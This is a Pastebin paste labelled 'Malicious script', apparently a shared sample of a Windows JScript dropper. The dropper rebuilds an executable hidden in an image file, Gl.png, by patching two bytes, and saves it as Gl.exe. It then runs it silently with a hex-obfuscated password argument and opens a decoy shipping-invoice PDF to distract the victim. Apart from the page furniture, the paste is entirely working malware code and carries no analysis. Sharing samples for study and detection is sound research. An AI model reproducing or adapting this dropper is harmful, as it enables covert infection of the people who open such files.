Advertisement
dynamoo

Malicious script

Oct 15th, 2014
588
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. var wsws = WScript.CreateObject("WScript.Shell");
  3.  
  4. var file="Gl.png";
  5.  
  6. var inp=new ActiveXObject("ADODB.Stream");
  7. inp.Type=1;
  8. inp.Open();
  9. inp.LoadFromFile(file);
  10.  
  11. var out=new ActiveXObject("ADODB.Stream");
  12. out.Type=1;
  13. out.Open();
  14.  
  15. var position=0x450;
  16. inp.CopyTo(out,position*1);
  17. inp.Read(1);
  18. out.Write(mb2b(eval("'"+"\x83"+"'")));
  19.  
  20. var position=0x33800-position;
  21. inp.CopyTo(out,(position*1)-1);
  22. inp.Read(1);
  23. out.Write(mb2b(eval("'"+"\x52"+"'")));
  24. inp.CopyTo(out);
  25. out.SaveToFile("Gl.exe",2);
  26.  
  27. function mb2b(byte){
  28. with(new ActiveXObject("ADODB.Recordset")){
  29.        Fields.Append("x",205,1);
  30.        Open();
  31.        AddNew();
  32.        Fields(0).AppendChunk(byte);
  33.        return Fields(0).GetChunk(1);
  34.    }
  35. }
  36.  
  37.  
  38. var _0x9848=["\x47\x6C\x2E\x65\x78\x65\x20\x2D\x70\x47\x6C\x75\x65\x31\x20\x2D\x64\x25\x74\x65\x6D\x70\x25"];wsws.Run(_0x9848[0],0);
  39.  
  40. wsws.Run("cmd.exe /c %temp%\\Shipping_Inv.pdf -d%temp%",0);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement